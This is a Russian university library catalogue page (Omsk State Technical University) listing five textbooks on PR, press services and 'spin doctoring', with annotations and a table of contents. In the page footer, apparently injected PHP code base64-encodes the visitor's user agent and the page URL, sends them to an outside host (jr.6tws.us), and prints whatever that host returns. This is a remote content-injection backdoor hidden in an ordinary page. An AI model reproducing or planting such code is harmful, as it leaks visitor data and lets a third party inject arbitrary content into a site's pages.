Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

361 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=СПИНДОКТОР")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 5
1. 
Татаринова, Галина Николаевна. Современная пресс-служба [Электронный ресурс] / Г. Н. Татаринова, 2013. - 1 o=эл. опт. диск (CD-ROM)
Оглавление 
Держатели документа (Информация об экземплярах) 

Учебное электронное издание представляет собой учебное пособие, в котором рассматриваются основы деятельности современной пресс-службы, формы и методы работы пресс-служб коммерческих структур, политических организаций, органов государственного управления, а также функции и роль пресс-секретаря, раскрываются основы менеджмента новостей.

Предназначено студентам гуманитарных факультетов, изучающих курс "Современная пресс-служба", а также может быть рекомендовано студентам, обучающимся по направлению "Реклама и связи с общественностью".

Полный текст
2. 
Почепцов, Георгий Георгиевич. Коммуникативные технологии двадцатого века [Текст] : монография / Г. Г. Почепцов, 2002. - 349 с.
3. 
Резепов, Ильдар Шамильевич. Психология рекламы и PR [Текст] : учеб. пособие / И. Ш. Резепов, 2008. - 222, [1] с.
Ключевые слова 
УЧЕБНИК И ПОСОБИЕ -- ОБЩЕСТВЕННОЕ -- МНЕНИЕ -- КОММУНИКАЦИЯ -- СОЦИУМ -- МОДЕЛЬ -- ВЕРБАЛЬНАЯ -- НЕВЕРБАЛЬНАЯ -- АРГУМЕНТИРУЮЩАЯ -- ИМИДЖЕВАЯ -- ИГРОВАЯ -- ПРИКЛАДНАЯ -- МАТЕМАТИЧЕСКАЯ -- КИБЕРНЕТИЧЕСКАЯ -- РАЗВЕДЫВАТЕЛЬНАЯ -- КОНФЛИКТОЛОГИЧЕСКАЯ -- ПСИХОЛОГИЧЕСКАЯ -- СОЦИАЛЬНО-ПСИХОЛОГИЧЕСКАЯ -- ЛИЧНОСТНАЯ -- МЕЖЛИЧНОСТНАЯ -- МАССОВАЯ -- СПЕЦИАЛИЗИРОВАННАЯ -- СЕМИОТИЧЕСКАЯ -- МИФОЛОГИЧЕСКАЯ -- ПСИХОТЕРАПЕВТИЧЕСКАЯ -- ПРОГРАММИРОВАНИЕ -- НЕЙРОЛИНГВИСТИЧЕСКОЕ -- ПСИХОТЕРАПИЯ -- ГРУППОВАЯ -- СЕМАНТИЧЕСКАЯ -- ИНФОРМАЦИОННО-КОДОВАЯ -- КОДОВАЯ -- ИНФЕРЕНЦИАЛЬНАЯ -- ИНТЕРАКЦИОННАЯ -- ПСИХОЛОГИЧЕСКИЙ -- АСПЕКТ -- ВНИМАНИЕ -- ПРИВЛЕЧЕНИЕ -- ПСИХОАНАЛИЗ -- БЕССОЗНАТЕЛЬНОЕ -- СМИ -- СРЕДСТВА МАССОВОЙ ИНФОРМАЦИИ -- ТЕЛЕРЕКЛАМА -- РАДИОРЕКЛАМА -- ПЕЧАТНАЯ -- ИНТЕРНЕТ-РЕКЛАМА -- НАРУЖНАЯ -- ДИЗАЙН -- ШРИФТ -- ЦВЕТ -- ОБРАЗ -- РЕКЛАМНЫЙ -- ТЕКСТ -- МЕНЕДЖМЕНТ -- КРЕАТИВ -- ЭФФЕКТИВНОСТЬ -- ИМК -- ИНТЕГРИРОВАННАЯ -- МАРКЕТИНГОВАЯ -- БРЕНДИНГ -- РИСК-МЕНЕДЖМЕНТ -- КРИЗИС-МЕНЕДЖМЕНТ -- МОТИВАЦИЯ -- ПЕРСОНАЛ -- СТИМУЛИРОВАНИЕ -- КУЛЬТУРА -- ВНУТРИКОРПОРАТИВНАЯ -- ИГРА -- ДЕЛОВАЯ -- ТРЕНИНГ -- СЕМИНАР -- МАСТЕР-КЛАСС -- КОМПАНИЯ -- ИМИДЖ -- PR-ДЕЯТЕЛЬНОСТЬ -- СПИЧРАЙТЕР -- КОПИРАЙТЕР -- СПИНДОКТОР -- ПРОДЮСЕР -- ФРИЛАНСЕР -- ПРОЕКТНЫЙ
Держатели документа (Информация об экземплярах) 

В простой и доступной форме в данной книге изложены оригинальные находки в области психологии рекламы и PR; показаны классические ошибки менеджеров по рекламе и PR в области психологии широко представлены инновационные находки в современной рекламной и PR-деятельности.

Книга может служить практическим пособием для подготовки менеджеров в вузах по курсу "Психология рекламы и PR", а также предназначена для всех интересующихся данной проблематикой.

4. 
Татаринова, Галина Николаевна. Современная пресс-служба [Текст] : учеб. пособие / Г. Н. Татаринова, 2007. - 82 с.
Оглавление 
  • Введение. - с.4
  • Из истории пресс-служб. - с.5
  • Структура и принципы организации современной пресс-службы. - с.11
  • Функции пресс-секретаря. - с.14
  • Формы и методы работы современной пресс-службы со СМИ, общественностью и политическими организациями. - с.17
  • Менеджмент новостей. - с.20
  • Спиндоктор как профессия. - с.22
  • Пресс-служба в коммерческой структуре. - с.25
  • Пресс-службы политических партий и движений. - с.28
  • Общая характеристика современных российских государственных пресс-служб. - с.31
  • Информационная работа государственных учреждений со средствами массовой информации и общественностью. - с.34
  • Проведение публичных акций, кампаний, налаживание двусторонней активной связи "организация-население". - с.37
  • Формы и методы координации деятельности российских государственных пресс-служб. - с.41
  • Роль Союза журналистов России. - с.43
  • Основные направления работы ДИП МИД РФ. - с.46
  • Практика организации и проведение аккредитации журналистов (правовые основы, основные направления работы). - с.51
  • Пресс-служба Президента РФ. - с.34
  • Планы семинарских и практических занятий. - с.58
  • Список рекомендуемой литературы. - с.70
  • Методические указания по выполнению домашних заданий. - с.72
  • Методические указания по самостоятельной подготовке студентов . - с.73
  • Приложения. - с.76
Держатели документа (Информация об экземплярах) 

В учебном пособии рассматриваются основы деятельности современной пресс-службы, формы и методы работы пресс-служб коммерческих структур, политический организаций, органов государственного управления, а также функции и роль пресс-секретаря, раскрываются основы менеджмента новостей. Для студентов гуманитарных факультетов, изучающих курс "Современная пресс-служба".

Полный текст
5. 
Синяева, Инга Михайловна. Паблик рилейшнз в коммерческой деятельности [Текст] : Учеб. для вузов по экон. специальностям / И. М. Синяева, 2003. - 413, [1] с.
Ключевые слова 
УЧЕБНИК И ПОСОБИЕ * -- PR -- МАРКЕТИНГОВАЯ ДЕЯТЕЛЬНОСТЬ -- ДЕЛОВОЕ ОБЩЕНИЕ -- PR-агентство -- PR-подразделение -- УПРАВЛЕНИЕ PR -- PR-кампания -- СМИ -- КОММУНИКАЦИЯ -- МАССОВАЯ КОММУНИКАЦИЯ -- ИНТЕРНЕТ -- МАРКЕТИНГОВАЯ КОММУНИКАЦИЯ -- ИНФОРМАЦИЯ -- КОММЕРЧЕСКАЯ ФИРМА -- ИМИДЖ -- КОРПОРАТИВНЫЙ PR -- ЭФФЕКТИВНОСТЬ PR -- АНТИКРИЗИСНОЕ УПРАВЛЕНИЕ -- СРЕДСТВА МАССОВОЙ ИНФОРМАЦИИ -- УСЛУГА PR -- КОРПОРАТИВНАЯ КУЛЬТУРА -- Знак экологический -- ЯРМАРКА - маркетинг -- ВЫСТАВКА - маркетинг -- Информация товарная -- ИМИДЖ ФИРМЫ -- Лоббирование -- КУЛЬТУРА КОРПОРАТИВНАЯ -- ИМИДЖ корпорации -- КОДЕКС ПРОФЕССИОНАЛЬНОЙ ЭТИК -- Кодекс этики PR-менеджера -- УПРАВЛЕНИЕ АНТИКРИЗИСНОЕ -- КРИЗИС - конфликт -- Спиндоктор -- ПАБЛИК РИЛЕЙШНЗ - словарь терминов

В новом издании рассматриваются социально-психологические модели коммуникативных процессов связей с общественностью, предлагаются рекомендации по созданию корпоративной культуры в коммерческих организациях, приводятся примеры использования PR как эффективного инструмента антикризисного управления.

Существенным вкладом в развитие теории PR является исследование инфраструктурной сущности услуги PR. Дается классификация основных видов услуг PR, получивших распространение на российском рынке. Рассматривается механизм взаимодействия PR со средствами массовой информации.

Для студентов экономических специальностей вузов, учащихся экономических колледжей, слушателей школ бизнеса, а также руководителей коммерческих служб, предпринимателей, менеджеров, консультантов - всех, кто использует средства PR в своей профессиональной деятельности.



    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3227 - 10.04.2020
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.78 с.12 запросов, 0.40c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;